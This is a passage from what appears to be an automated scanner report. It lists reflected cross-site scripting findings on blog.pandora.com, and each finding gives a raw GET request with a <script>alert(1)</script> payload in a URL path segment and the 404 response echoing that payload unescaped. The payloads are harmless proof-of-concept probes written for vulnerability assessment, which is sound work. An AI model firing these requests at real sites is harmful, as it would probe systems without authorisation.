Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:50 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora9839c<script>alert(1)</script>cc1f4677e63/archives/2008/01/ was not found on this server.</p>
...[SNIP]...

3.138. http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/01/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c4d9b<script>alert(1)</script>1d7f2c0691b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesc4d9b<script>alert(1)</script>1d7f2c0691b/2008/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc4d9b<script>alert(1)</script>1d7f2c0691b/2008/01/ was not found on this server.</p>
...[SNIP]...

3.139. http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/01/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 59e99<script>alert(1)</script>825e8cfc0de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200859e99<script>alert(1)</script>825e8cfc0de/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:54 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200859e99<script>alert(1)</script>825e8cfc0de/01/ was not found on this server.</p>
...[SNIP]...

3.140. http://blog.pandora.com/pandora/archives/2008/01/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/01/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fe2be<script>alert(1)</script>1f3f48cf5b1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/01fe2be<script>alert(1)</script>1f3f48cf5b1/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/01fe2be<script>alert(1)</script>1f3f48cf5b1/ was not found on this server.</p>
...[SNIP]...

3.141. http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/02/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ac1f<script>alert(1)</script>ef5a796adc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora2ac1f<script>alert(1)</script>ef5a796adc4/archives/2008/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora2ac1f<script>alert(1)</script>ef5a796adc4/archives/2008/02/ was not found on this server.</p>
...[SNIP]...

3.142. http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/02/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 34032<script>alert(1)</script>06892156e4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives34032<script>alert(1)</script>06892156e4e/2008/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives34032<script>alert(1)</script>06892156e4e/2008/02/ was not found on this server.</p>
...[SNIP]...

3.143. http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/02/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6411d<script>alert(1)</script>c8b26e3f983 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20086411d<script>alert(1)</script>c8b26e3f983/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20086411d<script>alert(1)</script>c8b26e3f983/02/ was not found on this server.</p>
...[SNIP]...

3.144. http://blog.pandora.com/pandora/archives/2008/02/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/02/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e1573<script>alert(1)</script>3b6a99d2827 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/02e1573<script>alert(1)</script>3b6a99d2827/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/02e1573<script>alert(1)</script>3b6a99d2827/ was not found on this server.</p>
...[SNIP]...

3.145. http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/03/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 172d5<script>alert(1)</script>d6b14e8dbb2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora172d5<script>alert(1)</script>d6b14e8dbb2/archives/2008/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:47 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora172d5<script>alert(1)</script>d6b14e8dbb2/archives/2008/03/ was not found on this server.</p>
...[SNIP]...

3.146. http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/03/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ee2e<script>alert(1)</script>224981c07fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives5ee2e<script>alert(1)</script>224981c07fd/2008/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:49 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5ee2e<script>alert(1)</script>224981c07fd/2008/03/ was not found on this server.</p>
...[SNIP]...

3.147. http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/03/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5184f<script>alert(1)</script>5f6e8db7f13 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20085184f<script>alert(1)</script>5f6e8db7f13/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20085184f<script>alert(1)</script>5f6e8db7f13/03/ was not found on this server.</p>
...[SNIP]...

3.148. http://blog.pandora.com/pandora/archives/2008/03/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/03/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dff11<script>alert(1)</script>9e8c2c2eee5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/03dff11<script>alert(1)</script>9e8c2c2eee5/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/03dff11<script>alert(1)</script>9e8c2c2eee5/ was not found on this server.</p>
...[SNIP]...

3.149. http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/04/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8b984<script>alert(1)</script>5934a17f05d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora8b984<script>alert(1)</script>5934a17f05d/archives/2008/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8b984<script>alert(1)</script>5934a17f05d/archives/2008/04/ was not found on this server.</p>
...[SNIP]...

3.150. http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/04/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload abb6d<script>alert(1)</script>79106cb9952 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesabb6d<script>alert(1)</script>79106cb9952/2008/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesabb6d<script>alert(1)</script>79106cb9952/2008/04/ was not found on this server.</p>
...[SNIP]...

3.151. http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/04/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 465a8<script>alert(1)</script>77d6f7cf9b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008465a8<script>alert(1)</script>77d6f7cf9b1/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008465a8<script>alert(1)</script>77d6f7cf9b1/04/ was not found on this server.</p>
...[SNIP]...

3.152. http://blog.pandora.com/pandora/archives/2008/04/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/04/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8193f<script>alert(1)</script>fa1c0f6c054 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/048193f<script>alert(1)</script>fa1c0f6c054/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/048193f<script>alert(1)</script>fa1c0f6c054/ was not found on this server.</p>
...[SNIP]...

3.153. http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/05/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fba06<script>alert(1)</script>415a42b75c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorafba06<script>alert(1)</script>415a42b75c1/archives/2008/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorafba06<script>alert(1)</script>415a42b75c1/archives/2008/05/ was not found on this server.</p>
...[SNIP]...

3.154. http://blog.pandora.com/pandora/archives/2008/05/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/05/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 189bf<script>alert(1)</script>7e15ac1b4e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives189bf<script>alert(1)</script>7e15ac1b4e2/2008/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
